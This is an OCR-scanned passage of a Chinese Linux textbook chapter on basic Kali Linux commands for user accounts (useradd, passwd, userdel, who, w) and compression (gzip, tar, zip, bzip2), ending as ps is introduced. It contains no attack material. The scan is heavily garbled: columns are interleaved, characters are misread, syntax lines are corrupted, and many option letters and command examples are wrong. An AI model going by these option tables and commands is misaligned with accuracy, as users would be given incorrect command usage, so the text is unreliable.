-a 在 所 有 的 man 帮 助手 册 中 搜索 返回 成 功 ， 除 非 使 用 了 无 效 的 _MODE 模式 或 者 选项 。 


等 价 于 whatis 指 令 ， 显 示 给 定 关 键 字 的 简 


人 4.7 用 户 账户 操作 命令 


-P 指定 内 容 时 使 用 分 页 程序 
-_M | 指定 man 手 册 搜索 的 路 和 任何 操作 系统 都 需要 人 来 使 用 ， 如 
例如 : 使 用 man 命 令 ， 查 看 ls 的 帮助 信 ， 何 创建 并 管理 账户 ， 优 是 本 节 要 学 习 的 


、 一 PS 
息 ， 下 图 为 命令 执行 效果 。 内 容 。 
IL5(1) User Commands LS5(1) 
4.7.1 Useradd 
ls - List directory contents 


Wi Kali Linux 系 统 中 的 useradd 命 令 用 于 建 部 红 喧 


ls [DPTIDN]... [EILE]... 


DESCRIPTION 好 、 Es 
List information about the FILES (the current directory by default), 立 用 户 账 号 。 账号 建 < 口 ，» 再 用 passwd 


5ort entries alphabetically if none of -cftuvSUX nor --sort is speci- 


fed 设 定 账号 的 密码 ， 还 可 用 userdel 删 除 账 


Mandatory arguments to long options are mandatory for short options 


a 号 ， 使 用 useradd 指 令 所 建立 的 账号 ， 实 际 
do not ignore entries starting with . 上 是 保存 在 /etc/passwd 文 本 文件 中 , 命令 


-A, --almost-all 


do not List implied . and .. 语法 式 如 下 
语 工 -; 
Dress h for help cr 0Q to Quit) 


--author 
Manllal Dane 1s(1} line 


NANE 
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useradd [-mMnr] [-c < 备注 >] [-d < 登入 目录 >] [-e < 有 效 期 限 >] [- < 缓冲 天 数 >] [-g < 群 组 >] 
[-G < 群 组 >] [-s <shell>] [-u <uid>] [用 户 帐 号 ] 


或 


useradd -D [-b] [-e < 有 效 期 限 >] [-f < 缓冲 天 数 >] [-g < 和 群 组 >] [-G < 群 组 >] [-s <shell>] 


命令 中 选项 的 参数 介绍 见 下 表 。 


表 ”useradd 命 令 参 数 介 绍 


选 项 含 义 

-C< 备 注 > 加 上 备注 文字 。 备 注 文字 会 保存 在 passwd 的 备注 栏 位 中 
-d< 登 录 目 录 > 指定 用 户 登录 时 的 起 始 目 录 
-D 变更 预 设 值 
-e< 有 效 期 限 > 指定 账号 的 有 效 期 限 
-< 缓冲 天 数 > 指定 在 密码 过 期 后 多 少 天 即 关 闭 该 账号 
-g< 群 组 > 指定 用 户 所 属 的 群 组 
-G< 群 组 > 指定 用 户 所 属 的 附加 群 组 
-m 自动 建立 用 户 的 登录 目录 
-M 不 要 目 动 建立 用 户 的 登录 目录 
| 取消 建立 以 用 户 名 称 为 名 的 群 组 
-I 建立 系统 账号 
-s<shell> 指定 用 户 登录 后 所 使 用 的 shell 
-u<uid> 指定 用 户 ID 

例如 : 使 用 useradd test 命 令 可 以 增加 一 或 


个 新 用 户 ， 执 行 命令 如 下 : 


# useradd test 


新 用 户 需 要 使 用 passwd 命 令 设 置 账号 密 
码 。 


Kali Linux 系 统 中 的 adduser 命 令 用 于 创 


” 建 用 户 账号 或 更 新 现 有 账号 资料 ，adduser 


与 useradd 指 令 为 同一 指令 ， 该 命令 的 使 用 
权限 为 系统 管理 员 。 命 令 语法 格式 如 下 : 


adduser Tc comentjt gq home dirl| 
Se exprire datelql EF inattive Cine og 
LINC Iroupll Gr grouple == mir 
ESLeEOneae ee MIi pp passw lls 
ne mm ud ollr nginid 


02 


= sa 
deFault homelnl ff aEEauucnanacwe 全 忆 
defaull expire datelll ss detault sheLLrl 


命令 中 选项 的 参数 介绍 见 下 表 。 
表 adduser 命 令 参 数 介 绍 
选 项 售 义 
新 使 用 者 位 于 密码 档 (通常 是 /etc/ 


-C comment passwd) 的 注解 资料 
设 定 使 用 者 的 家 目录 为 home dir， 预 

-dhome dir | 设 值 为 预 设 的 home 后 面 加 上 使 用 者 账 
号 loginid 


设 定 此 账号 的 使 用 期 限 (格式 为 
YYYY-MM-DD) ， 预 设 值 为 永久 有 效 


-e explre date 


例如 : 使 用 adduser test2 命 令 ， 创 建 一 
个 账号 ， 账 号 创建 过 程 中 会 提示 设置 密码 ， 
还 有 一 些 基本 信息 ， 下 图 为 执行 效果 。 
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root@kali:~/temp# adduser 
adduser : 只 允许 一 个 或 者 两 个 名 字 。 
root@kali:~/temp# adduser test2 
正在 添加 用 户 "test2" 
正在 添加 新 组 "test2" (1961) 
正在 添加 新 用 户 "test2" (1901) 到 组 ， "test2" 
创建 主 目录 "/home/test2" 
正在 从 "/etc/skel" 复 制 文件 ... 
输入 新 的 UNIX 密码 : 
重新 输入 新 的 UNIX 密码 : 
asswd : 已 成 功 更 新 密码 
在 改变 test2 的 用 户 信息 
输入 新 值 ， 或 直接 敲 回 车 键 以 使 用 默认 值 
名 []: 


房间 号 码 []: 
工作 电话 []: 


也 
这 些 信息 是 否 正确 ? [Y/n] y 


4.7.3 passwd 


Kali Linux 系 统 中 的 passwd 命 令 用 来 修 
改 账号 密码 ， 如 果 使 用 useradd 创 建 的 账户 
默认 是 没有 设置 密码 的 ， 可 以 通过 该 指令 
进行 设置 。 命 令 语法 格式 如 下 : 


Passwoa EL [IL [fai 3 
[usernamel] 


命令 中 选项 的 参数 介绍 见 下 表 。 
表 passwd 命 令 参 数 介 绍 
选 项 含 义 
-d 删除 密码 
f 强制 执行 
二 更 新 只 能 发 送 在 过 期 之 后 
-] 停止 账号 使 用 
、 显示 密码 信息 
-U 局 用 已 被 停止 的 账户 
EE 设置 密码 的 有 效 期 
-8 修改 群 组 密码 
-i 过 期 后 停止 用 户 账号 
例如 : 使 用 passwd 命 令 修 改 账号 密 


码 ， 下 图 为 命令 执行 效果 。 


root@kali:~/temp# passwd test 
输入 新 的 UNIX 密码 : 

重新 输入 新 的 UNIX 密码 : 
passwd : 已 成 功 更 新 密码 


4.7.4 userdel 


userdel 可 删除 用 户 账 号 与 相关 的 文 
件 。 知 不 加 参数 ， 则 仅 删 除 用 户 账 号 ， 而 
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不 删除 相关 文件 。 命 令 语法 格式 如 下 : 
userdel [-z] [用 户 账号 ] 


命令 中 选项 的 参数 -r， 表 示 删 除 用 户 登 
入 目录 以 及 目录 中 所 有 文件 。 

根据 实际 需求 选择 相应 的 指令 ， 删 除 账 
户 必须 存在 才 会 有 效果 ， 下 图 为 执行 效果 。 


root@kali:~# which deluser | 
/usr/sbin/deluser 

root@kali:-# which userdel 
/usr/sbin/userdel 

root@kali:~# UsSeradd test 
root@kali:-~# userdel test 
root@kali:-~# Useradd test 


root@kali:-~# deluser test 
正在 删除 用 户 'test' 
黎 告 : 组 "test" 没有 其 他 成 员 了 ， 


完成 。 
4.7.59 who a 
Kali Linux 系 统 中 的 who 命 令 用 于 显示 区 现 
系统 中 有 哪些 使 用 者 正在 上 面 ， 显 示 的 次 


料 包含 了 使 用 者 ID、 使 用 的 终端 机 、 从 哪 
边 连 上 来 的 、 上 线 时 间 、 末 清 时 间 、CPU 
使 用 量 、 动 作 等 。 所 有 使 用 者 都 可 使 用 。 
命令 语法 格式 如 下 : 


who — [husfV] [userl] 


命令 中 选项 的 参数 介绍 见 下 表 。 
表 who 命令 参数 介绍 

选 项 含 义 
-H 或 --heading 显示 各 栏 位 的 标题 信息 列 
显示 闲置 时 间 ， 若 该 用 户 在 前 
一 分 钟 之 内 有 进行 任何 动作 ， 
将 标示 成 “.” 号 ， 如 果 该 用 户 
已 超过 24 小 时 没有 任何 动作 ， 
则 标示 出 old 字 符 串 
此 选项 的 效果 和 指定 am i 字符 
串 相同 
只 显示 登录 系统 的 账号 名 称 和 
总 人 数 
此 选项 将 忽略 不 予 处 理 ， 仅 负 
-S 责 解决 who 指 令 其 他 版 本 的 兼 

容 性 问题 


-i 或 -u 或 --idle 


-q 或 --count 


-W 或 -IT 或 --mesg 或 -- 


message 或 --writable 


例如 : 


显示 用 户 的 信息 状态 栏 


rb 
pm 机 荆 
"MN 


使 用 who 命 令 查看 当前 账户 信 ea 
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器 注 训 上 四 息 ， 下 图 为 执行 效果 。 4.8.1 gzip 
Es IE 全 2018-10-30 22:44 (:1 Kall Linux 系 统 中 的 gzip 命 令 用 于 压缩 


Iroot@kali: ~/temp# SU test2 
pi /root/temp$ who 文件 ， 
root :1 2018-10-30 22:44 (:1) 


gzip 是 个 使 用 广泛 的 压缩 程序 ， 文 件 
经 它 压 缩 过 后 ， 其 名 称 后 面 会 多 出 “.gz 
的 扩展 名 。 命令 语法 格式 如 下 : 


a 今 白 一 gzip [-acdfhlLnNqrtvV][-S &lt; 压 缩 

Kali Linux 系 统 中 hwo dE “日 字 尾 字符 串 &gt;] [-&1t; 压 缩 效 率 &gt;] [--best/ 

前 登录 系统 的 用 户 信息 9 执行 这 项 指令 可 fast] [文件 ...] 或 gzip [-acdfhlLnNqrtvV] 
得 知 目前 登录 系统 的 用 户 有 哪些 人 ， 以 及 他 


[-S &lt; 压 缩 字 尾 字 符 串 ggt;] [-&1lt; 压 缩 效 率 


们 正在 执行 的 程序 。 单 独 执 行 w 指 令 会 显示 
所 有 的 用 户 ， 也 可 指定 用 户 名 称 ， 仅 显示 茶 
位 用 户 的 相关 信息 。 命 令 语法 格式 如 下 : 
w [-fhlsuV] [用 户 名 称 ] 
命令 中 选项 的 参数 介绍 见 下 表 。 
表 ”Ww 命令 参数 介绍 


选 项 含 义 

开启 或 关闭 显示 用 户 从 何 处 登录 系统 

-h 不 显示 各 栏 位 的 标题 信息 列 

| 使 用 详细 格式 列表 ， 此 为 预 设 值 
使 用 简洁 格式 列表 ， 不 显示 用 户 登 录 时 

-S 间 ， 终 端 机 阶段 作业 和 程序 所 耗费 的 
CPU 时 间 

忽略 执行 程序 的 名 称 ， 以 及 该 程序 耗费 
CPU 时 间 的 信息 

-Vy 显示 版 本 信息 


例如 : 使 用 w 命 令 碍 看 登录 用 户 的 详细 
信息 ， 下 图 为 执行 效果 。 


est2ekali: /root/temnp$ W | 
92;:00:19 3， 17， 1 user, load average: 0.080, 08.80, 0.00 
SER TTY FROM LOGING ee JCPU 人 
oot | | 22:44 ?xdm? 7:40 .12s po rb 


移 提 示 : Kali Linux 为 用 户 提供 了 两 个 用 于 


查询 用 户 信 息 的 指令 ， 六 和 为 who 命 令 与 W 命 


4.8 文件 解压 缩 操 作 命 令 


在 日 常 工 作 中 Kali Linux 系 统 会 产生 大 
量 的 日 志文 件 ， 如 果 不 去 处 理 可 能 会 导致 
硬盘 空间 告急 ， 因 此 合理 地 使 用 解压 缩合 
令 将 一 类 文件 压缩 存放 ， 既 可 以 减少 空间 
浪费 还 便于 移动 。 
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&gt;] [--best/fast] [目录 ] 


命令 中 选项 的 参数 介绍 见 下 表 。 
表 gzip 命令 参数 介绍 
选 项 含 & 义 
-a 或 --ascii 使 用 ASCII 文 字模 式 
-C 或 --stdout 或 --to- | 把 压缩 后 的 文件 输出 到 标准 输出 
stdout 设备 ， 不 去 更 动 原始 文件 
-d 或 --decompress 解 开 压缩 文件 
或 ----uncompress 
强行 压缩 文件 。 不 理会 文件 名 称 
-{ 或 --force 或 硬 连接 是 否 存在 以 及 该 文件 是 
否 为 符号 连接 
-h 或 --help 在 线 帮助 
-] 或 --list 列 出 压缩 文件 的 相关 信息 
-L 或 --license 显示 版 本 与 版 权 信息 


-0 或 --no-name 


-N 或 --name 
-q 或 --quiet 
-I 或 --recursive 


-S< 压 缩 字 尾 字符 
串 > 或 ----suffix< 压 
缩 字 尾 字符 串 > 
-t 或 --test 

-V 或 --verbose 


-V 或 --version 


-< 压缩 效率 > 


—best 


--fast 


压缩 文件 时 ， 不 保存 原来 的 文件 
名 称 及 时 间 戳 记 

压缩 文件 时 ， 保 存 原来 的 文件 名 
称 及 时 间 戳 记 

不 显示 警告 信息 

递归 处 理 ， 将 指定 目录 下 的 所 有 
文件 及 子 目 录 一 并 处 理 


更 改 压 缩 字 尾 字符 串 


测试 压缩 文件 是 否 正 确 无 误 
显示 指令 执行 过 程 
显示 版 本 信息 

压缩 效率 是 一 个 介 于 1 一 9 的 数 
值 ， 预 设 值 为 “6”， 指 定 越 大 
的 数值 ， 压 缩 效 率 就 会 越 高 

此 参数 的 效果 和 指定 “-9” 参 数 
相同 


此 参数 的 效果 和 指定 “-1” 参 数 
相同 
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gzip 命 令 只 能 压缩 文件 ， 例 如 : 使 用 
gzip services 命 令 压 缩 001.txt 文 件 ， 下 图 为 
运行 效果 ， 压 缩 后 源 文件 消失 ， 使 用 gzip -d 
可 以 解压 .gz 文件 ， 同 时 gz 压缩 比例 还 是 很 
大 的 。 


root@kali:~/temp# ls -\ 

总 用 量 29 

-rw-r--r-- 1 root root 19183 16 月 31 03:44 services 
root@kali:~/temp# gzip services 

root@kali:~/temp# ls -1 

总 用 量 8 

-rw-r--r-- 1 root root 7441 16 月 31 03:44 services.gz 


4.8.2 gunzip 


Kali Linux 系 统 中 的 gunzip 命 令 用 于 解 
压 文 件 。gunzip 是 个 使 用 广泛 的 解压 缩 程 
序 ， 它 用 于 解 开 被 gzip 压 缩 过 的 文件 ， 这 些 
压缩 文件 预 设 最 后 的 扩展 名 为 “.gz”。 事 
实 上 gunzip 就 是 gzip 的 硬 连接 ， 因 此 不 论 是 
压缩 或 解压 缩 ， 都 可 通过 gzip 指 令 单 独 完 
成 。 命 令 语法 格式 如 下 : 

Juan actirLLonmngeEeEvell ss 
压缩 字 尾 字符 串 >] [文件 ...] 或 gunzip 
[-acfhlLnNqrtvV] [-s < 压缩 字 尾 字符 串 >] [目录 ] 

命令 中 选项 的 参数 介绍 见 下 表 。 


表 gunzip 命 令 参 数 介绍 


选项 含 义 

-a 或 --ascii 使 用 ASCII 文 字模 式 

-Cc 或 --stdout 或 --to- | 把 解压 后 的 文件 输出 到 标准 输 

stdout 出 设备 
强行 解 开 压缩 文件 ， 不 理会 文 

-f 或 -force 件 名 称 或 硬 连 接 是 否 存 在 以 及 
该 文件 是 否 为 符号 连接 

-h 或 --help 在 线 帮 助 

-] 或 --list 列 出 压缩 文件 的 相关 信息 

-或 --license 显示 版 本 与 版 权 信 息 
解压 缩 时 ， 若 压缩 文件 内 含有 

-0 或 -no-name 远 来 的 文件 名 称 及 时 间 戳 记 ， 
则 将 其 忽略 不 予 处 理 
解压 缩 时 ， 若 压缩 文件 内 含有 

-N 或 -name 原来 的 文件 名 称 及 时 间 戳 记 ， 
则 将 其 回 存 到 解 开 的 文件 上 

-q 或 --quiet 不 显示 警告 信息 
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续 表 
含义 
递归 处 理 ， 将 指定 目录 下 的 所 
有 文件 及 子 目 录 一 并 处 理 


选 项 


-I 或 --recursive 


-S< 压 缩 字 尾 字符 串 

> 或 --suffix< 压 缩 字 | 更 改 压 缩 字 尾 字 符 串 

尾 字符 串 > 

-t 或 --test 测试 压缩 文件 是 否 正 确 无 误 
-V 或 --verbose 显示 指令 执行 过 程 

-V 或 --version 显示 版 本 信息 


gunzip 命 令 与 gzip 配 合 使 用 ， 通 过 gzip 总 二 


压缩 后 的 文件 可 以 通过 gunzip 解 压缩 ， 例 误 妥 让 
如 : 使 用 gunzip 001.txt.gz 命 令 ， 下 图 为 运 
行 效果 ， 解 压 后 源 压缩 包 消失 。 


root@kali:~/temp# ls -\ 
总 用 量 8 

-rw-r--r-- 1 root root 7441 16 月 31 03:44 services .gz 
root@kali:~/temp# gunzip Services .gz 
root@kali:~/temp# LS -\ 

总 用 量 29 

-rw-r--r-- 1 root root 19183 16 月 31 03:44 services 


4.8.3 tar te 
Kali Linux 系 统 中 的 tar 命 令 用 于 备份 文句 ee 
件 ，tar 是 用 来 建立 、 还 原 备份 文件 的 工具 程 
序 ， 它 可 以 加 入 ， 解 开 备 份 文件 内 的 文件 ， 
使 用 tar 命 令 压缩 后 ， 文 件 的 格式 为 .targz。 
命令 语法 格式 如 下 : 
tar 选项 [-zcf] [压缩 后 文件 名 ] [目录 ] 
命令 中 选项 的 参数 介绍 见 下 表 。 


表 tar 命令 参数 介绍 


选 项 含 义 
、 打包 
-V 显示 详细 信息 
. 指定 文件 名 
-7 打包 同时 压缩 


tar 命 令 可 以 将 目录 打包 成 一 个 文件 ， 
例如 : 使 用 tar -cvf temp.tar temp 命 令 ， 将 
目录 temp 打 包 成 temp.tar 文 件 ， 如 果 需 要 在 
打包 的 同时 进行 压缩 可 以 加 入 -z 选 项 ， 下 
为 tar -zcf temp.tar temp 命 令 执行 效果 ， 它 
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相当 于 tar -cvf temp.tar temp 和 gzip temp.tar 例如 : 使 用 tar -zxvf temp.tar.gz 命 令 ， 
两 条 命令 ， 男 外 .tar.gz 是 最 常见 的 源 代码 安 。 将 打 好 的 .tar.gz 包 进行 解压 ， 如 下 图 所 示 ， 
装 包 。 tar 解 压 是 不 删除 源 压 缩 文件 的 。 

root@kali:~# [LS -到 本 


pesktop Downloads Pictures temp Test esktop ey nlonds pictures temp tenp.tar.gz Videos 
pocuments Music Public Templates Videos ase 和 Zt sbtic Temptates Ee 
root@kali:-# tar -zcf temp.tar.gz temp emp/ 

root@kali:~# ls emp/ 901.txt 

Desktop Downloads Pictures temp temp.tar.gz Videos 
Documents Music Public Templates Test 


tar 命 令 解压 缩 的 命令 语法 格式 如 下 :; 。 ”4.8.4 zip 


tar 选项 [-zxvf] [压缩 后 的 文件 名 ] [目录 ] Kali Linux 系 统 中 的 zip 命 令 用 于 压 绒 
命令 中 选项 的 参数 介绍 见 下 表 。 dl ge 压缩 后 会 另外 产生 具有 
i “zip” 扩 展 名 的 压缩 文件 ， 同 时 它 也 是 多 

系统 之 间 兼 容 性 较 好 的 压缩 。 命 令 语法 格式 


选 项 含义 如 下 ; 

-X 解 包 
ne, zip [-AcdDfFghjJKlLmoqrSTuvVwXyz$] 
学 显示 详细 信息 [-b < 工作 目录 >] [-11] [-n < 字 尾 字符 囊 >] [-t < 
T 指定 解压 文件 日 期 时 间 >] [< 压缩 效率 >] [压缩 文件 ] [文件 ...] [-i 
< 范本 样式 >] [-x < 范本 样式 >] 
-Z 解压 缩 
命令 中 选项 的 参数 介绍 见 下 表 。 
表 zip 命令 参数 介绍 

选 项 含义 
-A 调整 可 执行 的 目 动 解压 缩 文 件 
-b< 工 作 目 录 > 指定 暂时 存放 文件 的 目录 
C 蔡 每 个 被 压缩 的 文件 加 上 注释 
-4 从 压缩 文件 内 删除 指定 的 文件 
-D 压缩 文件 内 不 建立 目录 名 称 


此 参数 的 效果 和 指定 “-u” 参 数 类 似 ， 但 不 仅 更 新 已 有 文件 ， 如 果 茶 些 文件 原本 不 存在 


四 于 压缩 文件 内 ， 使 用 本 参数 会 一 并 将 其 加 入 压缩 文件 中 

下 尝试 修复 已 损坏 的 压缩 文件 

局 将 文件 压缩 后 附加 在 已 有 的 压缩 文件 之 后 ， 而 非 另行 建 立新 的 压缩 文件 
h 在 线 帮助 

-i< 范 本 样式 > 只 压缩 符合 条 件 的 文件 

5 只 保存 文件 名 称 及 其 内 容 ， 而 不 存放 任何 目录 名 称 

汪 删除 压缩 文件 前 面 不 必要 的 数据 

上 使 用 MS-DOS 兼 容 格式 的 文件 名 称 

-| 压缩 文件 时 ， 把 LF 字符 置换 成 LF+CR 字 符 

-ll 压缩 文件 时 ， 把 LF+CR 字 符 置换 成 LF 字符 

二 显示 版 权 信 息 

-m 将 文件 压缩 并 加 入 压缩 文件 后 ， 删 除 原始 文件 ， 即 把 文件 移 到 压缩 文件 中 
-n< 字 尾 字 符 串 > 不 压缩 具有 特定 字 尾 字符 串 的 文件 
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续 表 
选 项 含义 
以 压缩 文件 内 拥有 最 新 更 改 时 间 的 文件 为 准 ， 将 压缩 文件 的 更 改 时 间 设 成 和 该 文件 
相同 
-q 不 显示 指令 执行 过 程 
I 递归 处 理 ， 将 指定 目录 下 的 所 有 文件 和 子 目 录 一 并 处 理 
-S 包含 系统 和 隐藏 文件 
-t< 日 期 时 间 > 把 压缩 文件 的 日 期 设 成 指定 的 日 期 
-T 检查 备份 文件 内 的 每 个 文件 是 否 正确 无 误 
-lu 更 换 较 新 的 文件 到 压缩 文件 内 
-V 显示 指令 执行 过 程 或 显示 版 本 信息 
-V 保存 VMS 操 作 系 统 的 文件 属性 
-W 在 文件 名 称 里 加 入 版 本 编号 ， 本 参数 仅 在 VMS 操 作 系统 下 有 效 
-X< 范 本 样式 > 压缩 时 排除 符合 条 件 的 文件 
-X 不 保存 额外 的 文件 属性 
-y 直接 保存 符号 连接 ， 而 非 该 连接 所 指向 的 文件 ， 本 参数 仅 在 UNIX 之 类 的 系统 下 有 效 
-$ 保存 第 一 个 被 压缩 文件 所 在 磁盘 的 郑 册 名 称 
-Z 蔡 压 缩 文件 加 上 注释 
-< 压缩 效率 > 压缩 效率 是 一 个 介 于 1 一 9 的 数值 


例如 : 使 用 zip -r temp.zip temp 命 令 压 4.8.5 Eap i \ 


缩 文 件 。 缩 zip 文 件 ，unzip 为 . ner 

root@kali:~# [LS a 五 、 

Desktop Downloads Pictures temp Test 程序 。 pp 令 格 式 语法 如 下 : 

Documents Music Public Templates Videos 

es rt yg temp unzip [-cflptuvz] [-agCjLMnoqsVX] [-P 
adding: temp/services (deflated 61%) < 密码 >] [ .zip 文 件 ] [文件 ] [-d < 目录 >] [-x < 文件 

root@kali:-~# LS 。 

Desktop Downloads Pictures temp temp.zip Videos >] 或 unzip [-2] 

pocuments Music Public Templates Test 


命令 中 选项 的 参数 介绍 见 下 表 。 
表 unzip 命令 参数 介绍 


选 项 含义 
-C 将 解压 缩 的 结果 显示 到 屏幕 上 ， 并 对 字符 做 适当 的 转换 
-f 更 新 现 有 的 文件 
-l 显示 压缩 文件 内 所 包含 的 文件 
- 与 -参数 类 似 ， 会 将 解压 缩 的 结果 显示 到 屏幕 上 ， 但 不 会 执行 任何 的 转换 
-t 检查 压缩 文件 是 否 正 确 
5 但 是 除了 更 新 现 有 的 文件 外 ， 也 会 将 压缩 文件 中 的 其 他 文件 解压 缩 到 目 
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-Dn 
-0 


-P< 密码 > 


[.zip 文 件 ] 
[文件 ] 

-d< 目 录 > 
-X< 文 件 > 


-Z Unzip 


黑客 攻防 与 无 线 巡 全 从 新 手 到 高 手 ( 超 值 版 ) 


执行 实时 显示 详细 的 信息 
仅 显 示 压 缩 文 件 的 备注 文字 


续 表 


对 文本 文件 进行 必要 的 字符 转换 


不 要 对 文本 文件 进行 字符 转换 


压缩 文件 中 的 文件 名 称 区 分 大 小 写 


不 处 理 压 缩 文 件 中 原 有 的 目录 路 径 
将 压缩 文件 中 的 全 部 文件 名 改 为 小 写 


将 输出 结果 送 到 more 程 序 处 理 
解压 缩 时 不 要 有 覆盖 原 有 的 文件 


不 必 先 询问 用 户 ，unzip 执 行 后 覆盖 原 有 文件 


使 用 zip 的 密码 选项 
执行 时 不 显示 任何 信息 


将 文件 名 中 的 空白 字符 转换 为 底线 字符 


保留 VMS 的 文件 版 本 信息 


解压 缩 时 同时 回 存 文件 原来 的 UID/GID 


指定 .zip 压 缩 文 件 


指定 要 处 理 .zip 压 缩 文 件 中 的 哪些 文件 
指定 文件 解压 缩 后 所 要 存储 的 目录 
指定 不 要 处 理 .zip 压 缩 文 件 中 的 哪些 文件 


-Z 等 于 执行 zipinfo 指 令 


unzip 命 令 同 样 是 解压 zip 格 式 的 文件 ， 


人 2 例如 : 使 用 unzip temp.zip 命 令 ， 解 压 zip 文 
” “ 件 ， 下 图 为 运行 效果 ， 由 于 源 文件 还 存在 


所 以 它 会 提示 是 否 要 人 蔡 换 源 文 件 ， 回 答 y 蔡 
换 ， n 不 蔡 换 。 


root@kali:~# ls 


Desktop 


Documents Music Public 
root@kali:-~# Unzip temp.zip 
Archive: temp.zip 

replace temp/services? [yl]es, [nl]o, [A]ll, [Njone, [rjename: y 
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inflating: temp/services 


Downloads Pictures temp temp.zip Videos 


Templates Test 


4.8.6 bzip2 


Kali Linux 系 统 中 的 bzip2 命 令 是 .bz2 
文件 的 压缩 程序 ，bzip2 采 用 新 的 压缩 演算 
法 ， 压 缩 效 果 比 传统 的 LZ77/LZ78 压 缩 算 法 
更 好 。 帮 没有 加 上 任何 参数 ，bzip2 压 缩 完 
文件 后 会 产生 .bz2 的 压缩 文件 ， 并 删除 原始 
的 文件 。 命 令 语法 格式 如 下 : 

bzip2 [-cdfhkLstvVz] [--repetitive- 


best] [--repetitive-fast][- 压缩 等 级 ] [要 压 
缩 的 文件 ] 
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-C 或 --stdout 


-d 或 --decompress 
-f 或 --force 


-h 或 --help 
-或 --keep 

-S 或 --small 
-t 或 --test 

-V 或 --verbose 
-Z 或 --compress 
--repetitive-best 
--repetitive-fast 
-压缩 等 级 


bzip2 是 gzip 的 一 个 升级 版 ， 也 只 能 


表 ”bzip2 命 令 参 数 介 绍 
含 义 
将 压缩 与 解压 缩 的 结果 送 到 标准 输出 
执行 解压 缩 


bzip2 在 压缩 或 解压 缩 时 ， 者 输出 文件 与 现 有 文件 同名 ， 预 设 不 会 覆盖 现 有 文件 。 知 要 
履 盖 ， 请 使 用 此 选项 


显示 帮助 
bzip2 在 压缩 或 解压 缩 后 ， 会 删除 原始 的 文件 。 若 要 保留 原始 文件 ， 请 使 用 此 选项 
降低 程序 执行 时 内 存 的 使 用 量 


测试 .bz2 压 缩 文件 的 完整 性 
压缩 或 解压 缩 文 件 时 ， 显 示 详 细 的 信息 
强制 执行 压缩 


大 文件 中 有 重复 出 现 的 资料 时 ， 可 利用 此 选项 提高 压缩 效果 

大 文件 中 有 重复 出 现 的 资料 时 ， 可 利用 此 选项 加 快 执行 速度 
压缩 时 的 区 块 大 小 

表 bunzip2 命 令 参 数 介绍 


于 压缩 文件 ， 并 且 压 缩 比 例 尺 人 。 如 果 压 
缩 一 个 比较 大 的 文件 推荐 使 用 ， 例 如 : 

运行 bzip2 -k services 命 令 ， 压 缩 services 
文件 ， 下 图 为 命令 执行 效果 ， 如 果 有 压缩 
目录 的 需求 ， 可 以 先 使 用 tar 命 令 将 目录 
打包 成 文件 ， 再 用 bzip2 进 行 压 缩 ， 也 可 
以 使 用 tar --cjf 一 次 性 打包 再 压缩 成 .tar.bz2 
格式 。 


root@kali:~/temp# ls -lL 

总 用 量 29 

-rw-r--r-- 1 root root 19183 10 有 月 31 93:44 services 
root@kali:~/temp# bzip2 -k services 
root@kali:~/temp# ls -1L 

总 用 量 28 

-rw-r--r-- 1 root root 19183 10 有 月 31 603:44 services 
-rw-r--r-- 1 root root 7108 196 月 31 93:44 services.bz2 


4.8.7 bunzip2 
Kali Linux 系 统 中 的 bunzip2 命 令 是 .bz2 


选 项 


-f 或 --force 


-k 或 --keep 


-S 或 --small 


-V 或 --verbose 


-].--license.-V 或 --version 


含 义 


解压 缩 时 ， 若 输出 的 文件 
与 现 有 文件 同名 时 ， 预 设 
不 会 覆盖 现 有 的 文件 。 寿 
要 履 疯 ， 请 使 用 此 参数 


在 解压 缩 后 ， 预 设 会 删除 
原来 的 压缩 文件 。 阁 要 保 
留 压 缩 文件 ， 请 使 用 此 参 
数 


降低 程序 执行 时 ， 内 存 的 
使 用 量 


解压 缩 文件 时 ， 显 示 详 细 
的 信息 


显示 版 本 信息 


例如 : 使 用 bunzip2 services.bz2 命 令 解 汤 i 


文件 的 解压 缩 程 序 。bunzip2 可 解压 缩 .bz2 
格式 的 压缩 文件 。bunzip2 实 际 上 是 bzip2 的 
符号 连接 ， 执 行 bunzip2 与 bzip2 -d 的 效果 相 
同 。 命 令 语法 格式 如 下 : 

bunzip2 [-fkLsvV][.bz2 压 缩 文件 ] 


命令 中 选项 的 参数 介绍 见 下 表 。 


压 文件 ， 下 图 为 命令 执行 效果 ， 如 果 想 要 
解压 .tar.bz2 的 文件 同样 可 以 使 用 tar -jzf 来 
完成 


root@kali:~/temp# ls -Ll 
总 用 量 8 

-rw-r--r-- 1 root root 7108 16 月 31 03:44 services.bz2 
root@kali:~/temp# bunzip2 services .bz2 
root@kali:~/temp# ls -1 

总 用 量 29 

-rw-r--r-- 1 root root 19183 16 月 31 03:44 services 
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在 对 文件 进行 压缩 解压 的 过 程 中 ， 应 壬 表 
该 注意 以 下 几 点 ;: 选 项 含义 
(1) .gz 格式 使 用 gzip 进行 压缩 ， 使 %CPU 占用 的 CPU 使 用 率 
用 gunzip 或 者 gzip -d 进行 解压 ， 只 可 压 %MEM 占用 的 记忆 体 使 用 率 
缩 文 件 。 VSZ 占用 的 虚拟 记忆 体 大 小 
(2) .tar 格式 使 用 tar -cf 进行 打包 , 使 ” Rss 占用 的 记忆 体 大 小 
用 -xf 进行 解 包 。 终端 的 次 要 装置 号 码 (minor device 
(3) targz 格式 使 用 tar -zcf 打 包 并 压 0 number of tty) 
缩 ， 使 用 -zxf 解压 缩 。 STAT 该 行程 的 状态 
(4) .zip 格式 使 用 zip 压缩 -r 压缩 目录 ， Dp 不 可 中 断 的 静止 
unzip 解压 缩 。 R 正在 执行 中 
(5) .bz2 格式 使 用 bzip2 进行 压缩 -k 下 各 上 上 状态 
保留 源 文件 ，bunzip2 解压 缩 。 牧 信 执行 
(6) .tar.bz2 格式 使 用 tar -cf 进行 打包 不 在 在 但 新 时 于 法 消 除 
并 压缩 ， 使 用 -xjf 解压 。 
Ww 没有 足够 的 记忆 体 分 页 可 分 配 
< 高 优先 序 的 行程 
4.9 网 络 系统 操作 命令 pe 


任何 操作 系统 如 果 不 能 上 网 那么 使 用 1 有 记忆 体 分 页 分 配 并 锁 在 记忆 体内 
的 意义 将 会 大 打折 扣 ， 接 入 网 络 是 当前 操 ‘实时 系统 或 [A 1/O) 
作 系 统 的 一 个 必要 任务 ， 因 此 掌握 基础 的 “全 行程 开始 时 间 
网 络 操作 是 很 有 必要 的 。 TIME 执行 的 时 间 
COMMAND “| 所 执行 的 指令 


i 4.9.1 ps - 
2 例如 : 使 用 ps 查看 系统 进行 信息 ， 下 


人 Kali Linux 系 统 中 的 ps 命令 用 于 显示 当前 进 图 为 执行 效果 ， 由 于 信息 量 比 较 大 ， 这 里 
